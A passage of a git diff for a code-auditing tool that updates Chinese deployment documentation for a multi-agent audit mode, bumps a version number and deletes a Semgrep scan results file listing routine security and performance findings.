[部署指南](DEPLOYMENT.md) - 完整部署说明 +- [配置说明](CONFIGURATION.md) - 详细配置参数 +- [架构详解](AGENT_AUDIT_ARCHITECTURE.md) - 深度架构文档 diff --git a/docs/DEPLOYMENT.md b/docs/DEPLOYMENT.md index cc0e336..7dc490e 100644 --- a/docs/DEPLOYMENT.md +++ b/docs/DEPLOYMENT.md @@ -1,11 +1,12 @@ # 部署指南 -本文档详细介绍 DeepAudit 的各种部署方式,包括 Docker Compose 一键部署、生产环境部署和本地开发环境搭建。 +本文档详细介绍 DeepAudit v3.0.0 的各种部署方式,包括 Docker Compose 一键部署、Agent 审计模式部署和本地开发环境搭建。 ## 目录 - [快速开始](#快速开始) - [Docker Compose 部署(推荐)](#docker-compose-部署推荐) +- [Agent 审计模式部署](#agent-审计模式部署) - [生产环境部署](#生产环境部署) - [本地开发部署](#本地开发部署) - [常见部署问题](#常见部署问题) @@ -50,10 +51,12 @@ docker compose up -d ### 系统要求 -- Docker 20.10+ -- Docker Compose 2.0+ -- 至少 2GB 可用内存 -- 至少 5GB 可用磁盘空间 +| 资源 | 基础模式 | Agent 模式 | +|------|----------|-----------| +| 内存 | 2GB+ | 4GB+ | +| 磁盘 | 5GB+ | 10GB+ | +| Docker | 20.10+ | 20.10+ | +| Docker Compose | 2.0+ | 2.0+ | ### 部署步骤 @@ -102,8 +105,8 @@ docker compose logs -f | 服务 | 端口 | 说明 | |------|------|------| -| `frontend` | 3000 | React 前端应用(生产构建,使用 serve 提供静态文件) | -| `backend` | 8000 | FastAPI 后端 API(使用 uv 管理依赖) | +| `frontend` | 3000 | React 前端应用(生产构建) | +| `backend` | 8000 | FastAPI 后端 API | | `db` | 5432 | PostgreSQL 15 数据库 | ### 访问地址 @@ -135,6 +138,91 @@ docker compose exec db psql -U postgres -d deepaudit --- +## Agent 审计模式部署 + +v3.0.0 新增的 Multi-Agent 深度审计功能,需要额外的服务支持。 + +### 功能特点 + +- 🤖 **Multi-Agent 架构**: Orchestrator/Analysis/Recon/Verification 多智能体协作 +- 🧠 **RAG 知识库**: 代码语义理解 + CWE/CVE 漏洞知识库 +- 🔒 **沙箱验证**: Docker 安全容器执行 PoC + +### 部署步骤 + +```bash +# 1. 配置 Agent 相关参数 +# 编辑 backend/.env,确保以下配置正确 + +# Agent 配置 +AGENT_ENABLED=true +AGENT_MAX_ITERATIONS=5 + +# 嵌入模型配置 +EMBEDDING_PROVIDER=openai +EMBEDDING_MODEL=text-embedding-3-small +EMBEDDING_API_KEY= # 留空则使用 LLM_API_KEY + +# 向量数据库配置(使用 Milvus) +VECTOR_DB_TYPE=milvus +MILVUS_HOST=milvus +MILVUS_PORT=19530 + +# 沙箱配置 +SANDBOX_ENABLED=true +``` + +```bash +# 2. 启动包含 Agent 服务的完整部署 +docker compose --profile agent up -d +``` + +### Agent 模式服务说明 + +| 服务 | 端口 | 说明 | +|------|------|------| +| `milvus` | 19530 | Milvus 向量数据库 | +| `milvus-etcd` | - | Milvus 元数据存储 | +| `milvus-minio` | - | Milvus 对象存储 | +| `redis` | 6379 | 任务队列(可选) | + +### 构建安全沙箱镜像 + +沙箱用于安全地执行漏洞验证 PoC: + +```bash +# 进入沙箱目录 +cd docker/sandbox + +# 构建沙箱镜像 +./build.sh + +# 验证镜像构建成功 +docker images | grep deepaudit-sandbox +``` + +沙箱镜像包含: +- Python 3.11 + 安全工具 (Semgrep, Bandit, Safety) +- Node.js 20 + npm audit +- Go 1.21 + gosec +- Rust (cargo-audit) +- Gitleaks, TruffleHog, OSV-Scanner + +### 验证 Agent 模式 + +```bash +# 检查所有服务状态 +docker compose --profile agent ps + +# 检查 Milvus 连接 +curl http://localhost:9091/healthz + +# 查看 Agent 日志 +docker compose logs -f backend | grep -i agent +``` + +--- + ## 生产环境部署 Docker Compose 默认配置已适用于生产环境: @@ -186,6 +274,16 @@ server { proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; } + + # SSE 事件流(Agent 审计日志) + location /api/v1/agent-tasks/ { + proxy_pass http://localhost:8000/api/v1/agent-tasks/; + proxy_http_version 1.1; + proxy_set_header Connection ""; + proxy_buffering off; + proxy_cache off; + proxy_read_timeout 86400; + } } ``` @@ -347,6 +445,33 @@ docker compose up -d backend 3. 重启 Docker Desktop 4. 重新构建:`docker compose build --no-cache` +### Agent 模式相关 + +**Q: Milvus 启动失败** + +```bash +# 检查 Milvus 相关服务状态 +docker compose --profile agent ps + +# 查看 Milvus 日志 +docker compose logs milvus milvus-etcd milvus-minio + +# 重新启动 Milvus 服务 +docker compose --profile agent restart milvus +``` + +**Q: 沙箱镜像构建失败** + +```bash +# 检查 Docker 服务状态 +docker info + +# 使用国内镜像源重新构建 +cd docker/sandbox +# 编辑 Dockerfile,使用国内镜像源 +./build.sh +``` + ### 后端相关 **Q: PDF 导出功能报错(WeasyPrint 依赖问题)** @@ -395,6 +520,7 @@ VITE_API_BASE_URL=http://localhost:8000/api/v1 ## 更多资源 - [配置说明](CONFIGURATION.md) - 详细的配置参数说明 +- [Agent 审计](AGENT_AUDIT.md) - Multi-Agent 审计模块详解 - [LLM 平台支持](LLM_PROVIDERS.md) - 各 LLM 平台的配置方法 - [常见问题](FAQ.md) - 更多问题解答 - [贡献指南](../CONTRIBUTING.md) - 参与项目开发 diff --git a/frontend/package.json b/frontend/package.json index c5a9e9a..0561af0 100644 --- a/frontend/package.json +++ b/frontend/package.json @@ -1,6 +1,6 @@ { "name": "deep-audit", - "version": "2.0.0-beta.7", + "version": "3.0.0", "type": "module", "scripts": { "dev": "vite", @@ -104,4 +104,4 @@ "react": "^16.8.0 || ^17 || ^18 || ^19" } } -} +} \ No newline at end of file diff --git a/semgrep_results.json b/semgrep_results.json deleted file mode 100644 index 60eb658..0000000 --- a/semgrep_results.json +++ /dev/null @@ -1 +0,0 @@ -{"version":"1.145.0","results":[{"check_id":"dockerfile.security.missing-user.missing-user","path":"/Users/lintsinghua/XCodeReviewer/backend/Dockerfile","start":{"line":57,"col":1,"offset":1424},"end":{"line":57,"col":71,"offset":1494},"extra":{"message":"By not specifying a USER, a program in the container may run as 'root'. This is a security hazard. If an attacker can control a process running as root, they may have control over the container. Ensure that the last USER in a Dockerfile is a USER other than 'root'.","fix":"USER non-root\nCMD [\"uvicorn\", \"app.main:app\", \"--host\", \"0.0.0.0\", \"--port\", \"8000\"]","metadata":{"cwe":["CWE-250: Execution with Unnecessary Privileges"],"category":"security","technology":["dockerfile"],"confidence":"MEDIUM","owasp":["A04:2021 - Insecure Design"],"references":["https://owasp.org/Top10/A04_2021-Insecure_Design"],"subcategory":["audit"],"likelihood":"LOW","impact":"MEDIUM","license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","vulnerability_class":["Improper Authorization"],"source":"https://semgrep.dev/r/dockerfile.security.missing-user.missing-user","shortlink":"https://sg.run/Gbvn"},"severity":"ERROR","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.sqlalchemy.performance.performance-improvements.len-all-count","path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":624,"col":34,"offset":23582},"end":{"line":626,"col":36,"offset":23719},"extra":{"message":"Using QUERY.count() instead of len(QUERY.all()) sends less data to the client since the SQLAlchemy method is performed server-side.","metadata":{"category":"performance","technology":["sqlalchemy"],"license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.sqlalchemy.performance.performance-improvements.len-all-count","shortlink":"https://sg.run/4y8g"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.sqlalchemy.performance.performance-improvements.len-all-count","path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":628,"col":31,"offset":23767},"end":{"line":630,"col":36,"offset":23910},"extra":{"message":"Using QUERY.count() instead of len(QUERY.all()) sends less data to the client since the SQLAlchemy method is performed server-side.","metadata":{"category":"performance","technology":["sqlalchemy"],"license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.sqlalchemy.performance.performance-improvements.len-all-count","shortlink":"https://sg.run/4y8g"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.sqlalchemy.performance.performance-improvements.len-all-count","path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":632,"col":34,"offset":23961},"end":{"line":634,"col":36,"offset":24113},"extra":{"message":"Using QUERY.count() instead of len(QUERY.all()) sends less data to the client since the SQLAlchemy method is performed server-side.","metadata":{"category":"performance","technology":["sqlalchemy"],"license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.sqlalchemy.performance.performance-improvements.len-all-count","shortlink":"https://sg.run/4y8g"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.fastapi.security.wildcard-cors.wildcard-cors","path":"/Users/lintsinghua/XCodeReviewer/backend/app/main.py","start":{"line":59,"col":19,"offset":1793},"end":{"line":59,"col":24,"offset":1798},"extra":{"message":"CORS policy allows any origin (using wildcard '*'). This is insecure and should be avoided.","metadata":{"cwe":["CWE-942: Permissive Cross-domain Policy with Untrusted Domains"],"owasp":["A05:2021 - Security Misconfiguration"],"category":"security","technology":["python","fastapi"],"references":["https://owasp.org/Top10/A05_2021-Security_Misconfiguration","https://cwe.mitre.org/data/definitions/942.html"],"likelihood":"HIGH","impact":"LOW","confidence":"MEDIUM","vulnerability_class":["Configuration"],"subcategory":["vuln"],"license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.fastapi.security.wildcard-cors.wildcard-cors","shortlink":"https://sg.run/KxApY"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/report_generator.py","start":{"line":432,"col":24,"offset":14717},"end":{"line":432,"col":50,"offset":14743},"extra":{"message":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS.","metadata":{"cwe":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"],"owasp":["A07:2017 - Cross-Site Scripting (XSS)","A03:2021 - Injection"],"references":["https://jinja.palletsprojects.com/en/2.11.x/api/#basics"],"category":"security","technology":["flask"],"cwe2022-top25":true,"cwe2021-top25":true,"subcategory":["audit"],"likelihood":"LOW","impact":"MEDIUM","confidence":"LOW","license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","vulnerability_class":["Cross-Site-Scripting (XSS)"],"source":"https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","shortlink":"https://sg.run/RoKe"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}}],"errors":[],"paths":{"scanned":["/Users/lintsinghua/XCodeReviewer/backend/.dockerignore","/Users/lintsinghua/XCodeReviewer/backend/.gitignore","/Users/lintsinghua/XCodeReviewer/backend/.python-version","/Users/lintsinghua/XCodeReviewer/backend/Dockerfile","/Users/lintsinghua/XCodeReviewer/backend/README_UV.md","/Users/lintsinghua/XCodeReviewer/backend/UV_MIGRATION.md","/Users/lintsinghua/XCodeReviewer/backend/alembic/env.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/script.py.mako","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/001_initial.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/004_add_prompts_and_rules.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/006_add_agent_tables.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/5fc1cc05d5d0_add_missing_user_fields.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/73889a94a455_add_is_active_to_projects.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/add_source_type_to_projects.py","/Users/lintsinghua/XCodeReviewer/backend/alembic.ini","/Users/lintsinghua/XCodeReviewer/backend/app/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/deps.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/api.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/auth.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/config.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/embedding_config.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/members.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/projects.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/prompts.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/rules.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/tasks.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/users.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/config.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/encryption.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/security.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/base.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/init_db.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/session.py","/Users/lintsinghua/XCodeReviewer/backend/app/main.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/agent_task.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/analysis.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/audit.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/audit_rule.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/project.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/prompt_template.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/user.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/user_config.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/audit_rule.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/prompt_template.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/token.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/user.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis_v2.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/base.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/orchestrator.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/recon.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/verification.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/event_manager.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/audit_graph.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/runner.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/json_parser.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/prompts/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/prompts/system_prompts.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/stream_handler.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/token_streamer.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/tool_stream.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/base.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/file_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/rag_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/sandbox_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/init_templates.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/baidu_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/doubao_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/litellm_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/minimax_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/base_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/factory.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/service.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/types.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/embeddings.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/indexer.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/retriever.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/report_generator.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/scanner.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/zip_storage.py","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/data_level0.bin","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/header.bin","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/length.bin","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/link_lists.bin","/Users/lintsinghua/XCodeReviewer/backend/env.example","/Users/lintsinghua/XCodeReviewer/backend/main.py","/Users/lintsinghua/XCodeReviewer/backend/pyproject.toml","/Users/lintsinghua/XCodeReviewer/backend/requirements-lock.txt","/Users/lintsinghua/XCodeReviewer/backend/requirements.txt","/Users/lintsinghua/XCodeReviewer/backend/start.sh","/Users/lintsinghua/XCodeReviewer/backend/static/images/logo_nobg.png","/Users/lintsinghua/XCodeReviewer/backend/test_logo.py","/Users/lintsinghua/XCodeReviewer/backend/uploads/.gitkeep","/Users/lintsinghua/XCodeReviewer/backend/uv.lock"]},"time":{"rules":[],"rules_parse_time":1.2000598907470703,"profiling_times":{"config_time":3.0274291038513184,"core_time":37.23275899887085,"ignores_time":0.0010230541229248047,"total_time":40.26207113265991},"parsing_time":{"total_time":0.0,"per_file_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_files":[]},"scanning_time":{"total_time":234.07624554634094,"per_file_time":{"mean":0.6966554926974439,"std_dev":4.675806630950063},"very_slow_stats":{"time_ratio":0.8731978438340042,"count_ratio":0.10416666666666667},"very_slow_files":[{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py","ftime":7.5774359703063965},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","ftime":8.510899066925049},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py","ftime":9.324252128601074},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py","ftime":10.199949026107788},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py","ftime":10.646106958389282},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/init_templates.py","ftime":11.258774042129517},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/prompts.py","ftime":11.770168781280518},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py","ftime":11.997308015823364},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py","ftime":12.751168012619019},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/projects.py","ftime":16.807862043380737}]},"matching_time":{"total_time":0.0,"per_file_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_files":[]},"tainting_time":{"total_time":0.0,"per_def_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_defs":[]},"fixpoint_timeouts":[{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/alembic/versions/006_add_agent_tables.py:19:4 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/006_add_agent_tables.py","start":{"line":19,"col":5,"offset":370},"end":{"line":19,"col":12,"offset":377}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py:203:10 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py","start":{"line":203,"col":11,"offset":5475},"end":{"line":203,"col":30,"offset":5494}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py:202:10 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":202,"col":11,"offset":7486},"end":{"line":202,"col":26,"offset":7501}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py:37:10 [rules: 1, first: python.flask.security.injection.tainted-url-host.tainted-url-host]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":37,"col":11,"offset":975},"end":{"line":37,"col":26,"offset":990}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py:488:10 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":488,"col":11,"offset":18788},"end":{"line":488,"col":29,"offset":18806}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py:47:10 [rules: 2, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py","start":{"line":47,"col":11,"offset":1499},"end":{"line":47,"col":27,"offset":1515}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/db/init_db.py:51:10 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/db/init_db.py","start":{"line":51,"col":11,"offset":1548},"end":{"line":51,"col":27,"offset":1564}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py:236:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py","start":{"line":236,"col":15,"offset":7437},"end":{"line":236,"col":18,"offset":7440}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/orchestrator.py:144:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/orchestrator.py","start":{"line":144,"col":15,"offset":4111},"end":{"line":144,"col":18,"offset":4114}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py:253:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py","start":{"line":253,"col":15,"offset":8497},"end":{"line":253,"col":18,"offset":8500}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/recon.py:207:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/recon.py","start":{"line":207,"col":15,"offset":6233},"end":{"line":207,"col":18,"offset":6236}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/verification.py:216:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/verification.py","start":{"line":216,"col":15,"offset":6905},"end":{"line":216,"col":18,"offset":6908}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/audit_graph.py:580:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/audit_graph.py","start":{"line":580,"col":15,"offset":18800},"end":{"line":580,"col":18,"offset":18803}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py:139:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py","start":{"line":139,"col":15,"offset":5316},"end":{"line":139,"col":23,"offset":5324}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py:277:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py","start":{"line":277,"col":15,"offset":11241},"end":{"line":277,"col":23,"offset":11249}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/json_parser.py:150:8 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/json_parser.py","start":{"line":150,"col":9,"offset":4774},"end":{"line":150,"col":14,"offset":4779}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py:342:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py","start":{"line":342,"col":15,"offset":11823},"end":{"line":342,"col":23,"offset":11831}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py:72:14 [rules: 1, first: 